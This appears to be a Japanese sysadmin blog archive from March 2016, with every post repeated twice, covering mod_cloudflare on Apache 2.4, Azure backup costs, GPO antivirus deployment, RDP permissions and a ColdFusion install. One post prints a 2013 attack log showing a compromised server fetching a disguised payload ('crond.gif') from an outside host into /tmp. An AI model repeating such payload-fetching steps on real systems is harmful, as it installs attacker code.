2016年03月
2016年03月31日
よくあることです。プロキシとか、リバースプロキシとか、ロードバランサとか。そういうのを導入すると、アクセス元のIPアドレスがそれらの機器になってしまいます。
そしてたいていはそれらの機器から、別な引数としてオリジナルのIPが渡されることが多いようです。
で、CloudFlare の場合は以下の方法で、オリジナルのIPを取得することができるようです。
Logging Real Visitor IP Addresses: mod_cloudflare for Apache httpd
さてこの方法ですが、Apache2.4ではできないようでした。
ということで以下の方法で作業します。
※ apxs がインストールされていない場合には、まずは以下のコマンド。
apt-get install apache2-dev
※僕の環境では、まずOSを最新にしないと依存関係の解消が大変でした。
apt-get update
apt-get upgrade
# ソースファイルダウンロード
wget https://raw.githubusercontent.com/cloudflare/mod_cloudflare/master/mod_cloudflare.c
# インストール
apxs -a -i -c mod_cloudflare.c
# apache 再起動
service apache2 restart
# モジュールの読み込み確認
apache2ctl -M |grep cloud
結果→ cloudflare_module (shared)
これで特に設定変更を行わなくても、apache のログには実IPが表示されるようになりました。
そしてたいていはそれらの機器から、別な引数としてオリジナルのIPが渡されることが多いようです。
で、CloudFlare の場合は以下の方法で、オリジナルのIPを取得することができるようです。
Logging Real Visitor IP Addresses: mod_cloudflare for Apache httpd
さてこの方法ですが、Apache2.4ではできないようでした。
ということで以下の方法で作業します。
※ apxs がインストールされていない場合には、まずは以下のコマンド。
apt-get install apache2-dev
※僕の環境では、まずOSを最新にしないと依存関係の解消が大変でした。
apt-get update
apt-get upgrade
# ソースファイルダウンロード
wget https://raw.githubusercontent.com/cloudflare/mod_cloudflare/master/mod_cloudflare.c
# インストール
apxs -a -i -c mod_cloudflare.c
# apache 再起動
service apache2 restart
# モジュールの読み込み確認
apache2ctl -M |grep cloud
結果→ cloudflare_module (shared)
これで特に設定変更を行わなくても、apache のログには実IPが表示されるようになりました。
2016年03月30日
QNAPを利用しています。そしてAzureでバックアップを取得しています。
初めて使うこの構成ですが、料金がどのように推移するのかとても心配でした。
ということで数ヶ月運用していたので、結果を。
QNAP利用量は、概ね100Gです。
QNAPからバックアップを毎日1回しています。
ブロック BLOB数: 76,000
サイズ: 105G
日々のリクエスト: 100前後
この状態で、概ね月々の料金は数百円でした。
容量の割に思っていたよりも安くて安心しました。
※日々の更新ファイルなどによって価格が変動する可能性があるので、注意してください。
現在のAzureストレージの料金は、
Azureデータセンターへのデータについては無料。
Azureからでていくデータは有料。
保存されているデータは有料
ということなので、バックアップ用途の場合、バックアップを取る場合にはデータ通信費は無料。保管料としていくらか必要。
復元などの場合には、データ通信費は有料(5Gまでは無料、10Tまで、約9円/GB)
1Tのバックアップの場合、
ディスク料金が約3円/GBなので、3,000円。
通信費無し。
1Tのデータを復元する場合には、上記ディスク料金に加え、9,000円ぐらいが必要になるという考えのようです。
初めて使うこの構成ですが、料金がどのように推移するのかとても心配でした。
ということで数ヶ月運用していたので、結果を。
QNAP利用量は、概ね100Gです。
QNAPからバックアップを毎日1回しています。
ブロック BLOB数: 76,000
サイズ: 105G
日々のリクエスト: 100前後
この状態で、概ね月々の料金は数百円でした。
容量の割に思っていたよりも安くて安心しました。
※日々の更新ファイルなどによって価格が変動する可能性があるので、注意してください。
現在のAzureストレージの料金は、
Azureデータセンターへのデータについては無料。
Azureからでていくデータは有料。
保存されているデータは有料
ということなので、バックアップ用途の場合、バックアップを取る場合にはデータ通信費は無料。保管料としていくらか必要。
復元などの場合には、データ通信費は有料(5Gまでは無料、10Tまで、約9円/GB)
1Tのバックアップの場合、
ディスク料金が約3円/GBなので、3,000円。
通信費無し。
1Tのデータを復元する場合には、上記ディスク料金に加え、9,000円ぐらいが必要になるという考えのようです。
2016年03月29日
アンチウイルスソフトを利用しています。
このとき、各PCへのインストールを一括で行いたいと考えました。
メーカーのホームページでは、ActiveDirectoryでグループポリシーを利用したインストール方法について記載がありました。
ごく簡単なことで、bat ファイルを作成し、それを各端末で実行させるようにすればいいだけです。
順調にbatファイルを配置し、実行可能状態にしました。もちろんクライアントを直接操作し、batファイルを実行すると問題無くソフトのインストールが行われました。
しかしGPOでの配備はうまくいきません。エラーなども特に出ておらずこまった・・と。
で、結局のところ、コンピューターのポリシーにたいして、ログオンスクリプトを付与していました。
そのため、アクセス権限がなかったようなのです。
確かにファイル共有は、ユーザー権限については読み取りで比較的自由でしたが、コンピューターに対しては一切の権限を付与していませんでした。
そもそもコンピューターに権限を付与したい状態なんてないですから・・・。
ということで Domain Computers をアクセス権限に入れ、解決しました。
このとき、各PCへのインストールを一括で行いたいと考えました。
メーカーのホームページでは、ActiveDirectoryでグループポリシーを利用したインストール方法について記載がありました。
ごく簡単なことで、bat ファイルを作成し、それを各端末で実行させるようにすればいいだけです。
順調にbatファイルを配置し、実行可能状態にしました。もちろんクライアントを直接操作し、batファイルを実行すると問題無くソフトのインストールが行われました。
しかしGPOでの配備はうまくいきません。エラーなども特に出ておらずこまった・・と。
で、結局のところ、コンピューターのポリシーにたいして、ログオンスクリプトを付与していました。
そのため、アクセス権限がなかったようなのです。
確かにファイル共有は、ユーザー権限については読み取りで比較的自由でしたが、コンピューターに対しては一切の権限を付与していませんでした。
そもそもコンピューターに権限を付与したい状態なんてないですから・・・。
ということで Domain Computers をアクセス権限に入れ、解決しました。
2016年03月28日
2015年12月23日:Asus P9X79 を使用したPCが遅かったのでソフトウェアを最新にしたら解決したかも?メモ。
上記URLと全く同じタイトル・記事で投稿していました。
いや、この記事ってなんとなく重複していると思っていたんですよ。調べても出てこなかったから投稿していました。
削除日: 2016/05/16
上記URLと全く同じタイトル・記事で投稿していました。
いや、この記事ってなんとなく重複していると思っていたんですよ。調べても出てこなかったから投稿していました。
削除日: 2016/05/16
2016年03月27日
昔の記事なのですが、公開されていなかったので、メモ。
※2012年ごろに書いた記事です。
久々のエラー。昔はこういうのをよく体験していたのですが、最近はとんと。
マイコンピュータのプロパティ - リモートの設定から、設定ができているのは確認済み。もちろんこういうことなので、FWもあいているでしょう。
ということで権限でした。
ActiveDirectory環境だったのでUsers権限ではリモートデスクトップはできません。
Remote Desktop Users ですね。ただしローカルグループだということなので、サーバーごとに注意する必要があるかもしれません。
ADのユーザ権限について
※すいません。検証だったので administrators にして解決してしまいました・・・
※2012年ごろに書いた記事です。
久々のエラー。昔はこういうのをよく体験していたのですが、最近はとんと。
マイコンピュータのプロパティ - リモートの設定から、設定ができているのは確認済み。もちろんこういうことなので、FWもあいているでしょう。
ということで権限でした。
ActiveDirectory環境だったのでUsers権限ではリモートデスクトップはできません。
Remote Desktop Users ですね。ただしローカルグループだということなので、サーバーごとに注意する必要があるかもしれません。
ADのユーザ権限について
※すいません。検証だったので administrators にして解決してしまいました・・・
2016年03月26日
昔の記事なのですが、公開されていなかったので、メモ。
本件のログですがおそらく、phpmyadmin の脆弱性を突いた攻撃だと思われます。
※詳細は当時のことなのでよく覚えていませんが・・・
no crontab for apache
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove directory `/tmp/.ICE-unix': Operation not permitted
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
--2013-01-07 20:14:20-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 23.0K=0.7s
2013-01-07 20:14:22 (23.0 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 15620 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 15620 100 15620 0 0 11675 0 0:00:01 0:00:01 --:--:-- 23348
sh: fetch: command not found
sh: lynx: command not found
--2013-01-07 20:14:25-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/tmp/but.gif'
0K .......... ..... 100% 22.9K=0.7s
2013-01-07 20:14:26 (22.9 KB/s) - `/tmp/but.gif' saved [15620/15620]
--2013-01-07 20:14:26-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 22.7K=0.7s
2013-01-07 20:14:28 (22.7 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 8 15620 8 1448 0 0 2133 0 0:00:07 --:--:-- 0:00:07 2133^M100 15620 100 15620 0 0 11550 0 0:00:01 0:00:01 --:--:-- 21057
sh: lynx: command not found
--2013-01-07 20:14:31-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/var/tmp/crond.gif'
0K .......... ..... 100% 22.6K=0.7s
2013-01-07 20:14:32 (22.6 KB/s) - `/var/tmp/crond.gif' saved [15620/15620]
本件のログですがおそらく、phpmyadmin の脆弱性を突いた攻撃だと思われます。
※詳細は当時のことなのでよく覚えていませんが・・・
no crontab for apache
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove directory `/tmp/.ICE-unix': Operation not permitted
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
--2013-01-07 20:14:20-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 23.0K=0.7s
2013-01-07 20:14:22 (23.0 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 15620 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 15620 100 15620 0 0 11675 0 0:00:01 0:00:01 --:--:-- 23348
sh: fetch: command not found
sh: lynx: command not found
--2013-01-07 20:14:25-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/tmp/but.gif'
0K .......... ..... 100% 22.9K=0.7s
2013-01-07 20:14:26 (22.9 KB/s) - `/tmp/but.gif' saved [15620/15620]
--2013-01-07 20:14:26-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'
0K .......... ..... 100% 22.7K=0.7s
2013-01-07 20:14:28 (22.7 KB/s) - `crond.gif' saved [15620/15620]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 8 15620 8 1448 0 0 2133 0 0:00:07 --:--:-- 0:00:07 2133^M100 15620 100 15620 0 0 11550 0 0:00:01 0:00:01 --:--:-- 21057
sh: lynx: command not found
--2013-01-07 20:14:31-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/var/tmp/crond.gif'
0K .......... ..... 100% 22.6K=0.7s
2013-01-07 20:14:32 (22.6 KB/s) - `/var/tmp/crond.gif' saved [15620/15620]
2016年03月25日
※2011年に書いた記事ですが、なぜか公開していなかったので、改めて公開します。まあ有用性はまったくないですが・・
Windows Server 2008 R2(64bit) IIS 7.5 に ColdFusion9 (32bit) をインストールしました。もともとは Windows 2003 + ColdFusion5 で動いていました。
これを新しい環境に移行です。
※ちなみになんとしても CF9 64bit を動かしたかったのですが、DBアクセスの問題が生じたために諦めました。
ということで、以下インストールです。
ColdFusion9 32bit を用意します。
アップデータも出ているのでアドビのサイトからダウンロードします。
※画像の一覧はこちらに http://nex5-fan.com/photo/?no=5
1. IIS の設定
IISは CF9 の場合は ISAPI 等の関係で、IIS6互換の機能を追加する必要があるようです。しかしアップデータを適用するので、互換はむしろ必要ありません。
2.CF9 のインストール
2.CF9 アップデータのインストール※必ずCF9の32bitに合わせること
3. 続けて Webサーバー設定を行います
4. IISの設定を変更します。
アプリケーションプール - DefaultAppPool - 詳細設定
32 ビット アプリケーションの有効かを True
ISAPIおよびCGIの制限に以下のように設定があることを確認
ハンドラーマッピングに cfm の登録を行う
5. 最後に CFの設定画面を開きます。
以上で完了です。
Windows Server 2008 R2(64bit) IIS 7.5 に ColdFusion9 (32bit) をインストールしました。もともとは Windows 2003 + ColdFusion5 で動いていました。
これを新しい環境に移行です。
※ちなみになんとしても CF9 64bit を動かしたかったのですが、DBアクセスの問題が生じたために諦めました。
ということで、以下インストールです。
ColdFusion9 32bit を用意します。
アップデータも出ているのでアドビのサイトからダウンロードします。
※画像の一覧はこちらに http://nex5-fan.com/photo/?no=5
1. IIS の設定
IISは CF9 の場合は ISAPI 等の関係で、IIS6互換の機能を追加する必要があるようです。しかしアップデータを適用するので、互換はむしろ必要ありません。
2.CF9 のインストール
2.CF9 アップデータのインストール※必ずCF9の32bitに合わせること
3. 続けて Webサーバー設定を行います
4. IISの設定を変更します。
アプリケーションプール - DefaultAppPool - 詳細設定
32 ビット アプリケーションの有効かを True
ISAPIおよびCGIの制限に以下のように設定があることを確認
ハンドラーマッピングに cfm の登録を行う
5. 最後に CFの設定画面を開きます。
以上で完了です。